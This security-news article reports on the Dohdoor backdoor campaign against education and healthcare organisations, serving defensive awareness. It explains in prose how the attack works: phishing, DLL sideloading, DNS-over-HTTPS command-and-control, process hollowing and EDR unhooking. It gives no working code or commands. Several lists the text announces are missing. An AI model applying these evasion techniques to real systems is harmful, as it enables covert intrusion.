Cyber threats targeting critical sectors continue to grow, and the discovery of the Dohdoor backdoor highlights how sophisticated modern attacks have become. This campaign targets organizations in the education and healthcare sectors, which manage large amounts of sensitive data and complex IT systems. By using techniques such as phishing, DLL sideloading, and encrypted command-and-control communication through DNS-over-HTTPS, attackers can quietly infiltrate networks while disguising malicious traffic as legitimate activity.
The education and healthcare sectors have long been attractive targets for cybercriminals because they manage large volumes of sensitive data and rely on complex digital infrastructures. Recently, cybersecurity researchers uncovered a sophisticated campaign involving a previously unknown malware called Dohdoor, which specifically targeted organizations within these two sectors.
Discovered by Cisco Talos, the campaign—linked to a threat actor tracked as UAT-10027—has been active since at least December 2025. The attackers deployed Dohdoor, a stealthy backdoor that uses advanced techniques such as DNS-over-HTTPS (DoH) communication, DLL sideloading, and reflective payload execution. These capabilities allow attackers to maintain covert access to compromised systems while avoiding many traditional security detection methods.
Dohdoor itself is a sophisticated backdoor designed to infiltrate Windows systems and provide remote attackers with persistent control. Unlike conventional malware that communicates through easily detectable channels, Dohdoor uses DNS-over-HTTPS (DoH) to disguise command-and-control (C2) traffic as legitimate encrypted web activity. By embedding malicious communications within normal HTTPS traffic, the malware significantly reduces the chances of being detected by network monitoring tools. Once deployed, Dohdoor can perform several malicious activities, including:
These capabilities make Dohdoor a powerful tool for cyber espionage and long-term network infiltration.
Read: How Criminals Exploit Prepaid SIM Loopholes
The education and healthcare sectors present attractive opportunities for cyber attackers because they manage highly sensitive data and operate complex digital environments. These factors make them frequent targets for sophisticated threats such as Dohdoor malware.
Healthcare organizations store vast amounts of confidential patient information, including medical records, insurance details, and personal identifiers. Similarly, educational institutions maintain extensive databases containing student records, academic research, and intellectual property. This sensitive data can be highly valuable for cybercriminals, whether for financial gain, identity theft, or espionage activities.
Universities, hospitals, and research institutions often rely on large and decentralized IT environments that combine legacy systems, research networks, third-party software integrations, and numerous devices used by staff and students. The complexity of these systems increases the number of potential vulnerabilities and creates multiple entry points that attackers can exploit.
Many organizations in the education and healthcare sectors operate with limited cybersecurity budgets and staffing. As a result, they may struggle to implement advanced threat detection technologies or maintain dedicated security teams capable of responding quickly to sophisticated attacks. Threat actors often exploit these limitations to deploy malware like Dohdoor with minimal resistance.
Healthcare institutions must prioritize patient care and operational continuity, while educational organizations focus on maintaining uninterrupted learning and research activities. This operational urgency can sometimes delay security updates or incident response actions, giving attackers more time to infiltrate systems and remain undetected.
Because of these combined factors, education and healthcare organizations continue to face a higher risk of targeted cyberattacks, making stronger cybersecurity awareness and defensive strategies essential.
The Dohdoor campaign uses a carefully designed multi-stage attack chain that allows attackers to gradually escalate their access within a victim’s network while remaining difficult to detect.
Although the exact entry point remains unclear, researchers believe the attackers most likely gained access through phishing-based social engineering attacks. Victims may receive emails containing malicious scripts or links that trigger the first stage of the infection. These phishing messages are crafted to look legitimate, increasing the chances that recipients will open attachments or execute embedded scripts.
Once the phishing attack succeeds, a PowerShell script is executed on the victim’s system. This script downloads a Windows batch file from a remote staging server, often using the built-in Windows utility curl.exe with encoded URLs to retrieve the malicious files. The downloaded batch files typically use extensions such as:
This stage helps attackers establish an initial foothold that prepares the system for the next phase of the attack.
The third stage involves a Windows batch script dropper that orchestrates a DLL sideloading technique. The script performs several key actions to execute the malicious payload while hiding its presence within legitimate system processes. Key activities performed by the script include:
Because the malicious DLL is executed through legitimate Windows processes, many security tools may fail to immediately detect the intrusion.
To avoid detection and complicate incident investigations, the attackers incorporated several anti-forensic measures. After executing the malicious payload, the batch script performs cleanup operations such as:
These actions make it significantly more difficult for investigators to reconstruct the attack timeline.
One of the most advanced features of Dohdoor is its use of DNS-over-HTTPS (DoH) to communicate with its command-and-control (C2) infrastructure. Unlike traditional malware that relies on standard DNS queries to locate command servers, Dohdoor hides this activity within encrypted HTTPS traffic.
In a typical scenario, security tools can monitor or block suspicious DNS requests. However, Dohdoor encrypts its DNS queries and sends them to Cloudflare’s DNS service over port 443, making the traffic appear like normal encrypted web communication. Because of this, the malware can bypass many traditional DNS monitoring systems and maintain stealthy communication with its command server.
Another key element of the attack is the use of Cloudflare infrastructure to hide the location of the actual command-and-control servers. By routing malicious traffic through Cloudflare’s edge network, attackers can disguise their communication and make it appear as legitimate encrypted traffic to trusted global IP addresses. This technique helps conceal the real C2 server behind a reputable cloud service and makes it more difficult for network monitoring tools to detect suspicious activity. By leveraging Cloudflare’s network, attackers ensure that:
The attackers also used cleverly disguised subdomains designed to mimic legitimate software services, such as:
To further evade detection, they used unusual top-level domains with irregular capitalization, including:
After establishing communication with the command server, Dohdoor downloads encrypted payloads that are executed directly in memory. The malware decrypts these payloads using a custom XOR-SUB encryption algorithm, then injects them into legitimate Windows processes through a technique known as process hollowing, allowing the malicious code to run while appearing as normal system activity. Some of the targeted Windows processes include:
Because the malicious code runs inside legitimate system processes, security tools may interpret the activity as normal behavior, helping the malware remain hidden.
Dohdoor also includes mechanisms designed to bypass Endpoint Detection and Response (EDR) systems. One notable technique involves unhooking system calls from ntdll.dll, a critical Windows library that security products often monitor. Security solutions typically insert hooks into system functions to observe suspicious activity. However, Dohdoor can detect these hooks and replace them with direct system call instructions, effectively bypassing the monitoring mechanism. This capability allows the malware to operate with minimal visibility and avoid triggering many endpoint security alerts.
Researchers observed that several technical characteristics of the Dohdoor campaign resemble tactics used by North Korean cyber groups. These similarities suggest a possible connection between the threat actor UAT-10027 and known North Korean advanced persistent threat operations. The similarities include:
These techniques resemble those used by the Lazarus Group, a well-known North Korean advanced persistent threat (APT) group. However, researchers currently attribute the campaign to UAT-10027 with low confidence, meaning the connection has not been fully confirmed. Interestingly, the campaign’s focus on education and healthcare sectors differs from Lazarus’s typical targets, which often include cryptocurrency platforms and defense organizations.
Analysis of the command-and-control infrastructure suggests that the attackers may have used Cobalt Strike Beacon as a follow-up payload after the initial compromise. Cobalt Strike is a commonly used post-exploitation framework that allows attackers to maintain persistent access and conduct further malicious activities within a network.
Indicators such as the observed JA3S hash and TLS certificate details closely resemble those associated with default Cobalt Strike servers. If confirmed, this would indicate that Dohdoor functions as an initial loader that prepares the environment for more advanced attack tools.
The Dohdoor campaign demonstrates how attackers continue to evolve their techniques to target critical sectors such as education and healthcare. These industries manage valuable data and operate complex digital environments, making them attractive targets for sophisticated cyber operations. Organizations in these sectors face several security challenges, including:
Advanced threats like Dohdoor highlight the urgent need for stronger cybersecurity practices, improved monitoring, and greater awareness to defend against increasingly sophisticated attacks.
Although Dohdoor malware uses advanced techniques to evade detection, organizations can significantly reduce their risk by implementing strong cybersecurity practices and improving their security monitoring capabilities.
By applying these security measures, organizations—especially those in the education and healthcare sectors can strengthen their defenses and reduce the risk of sophisticated threats like Dohdoor malware.
Read: Hackers vs. Handcuffs: Inside the Global Cybercrime Crackdown
The Dohdoor malware campaign targeting the education and healthcare sectors highlights the growing sophistication of modern cyber threats. By combining phishing, DLL sideloading, DNS-over-HTTPS communication, and EDR evasion techniques, attackers can infiltrate organizations while remaining hidden for long periods. This campaign underscores the need for stronger cybersecurity defenses, improved employee awareness, and proactive threat detection, especially in sectors where protecting sensitive data is critical to both operations and public trust.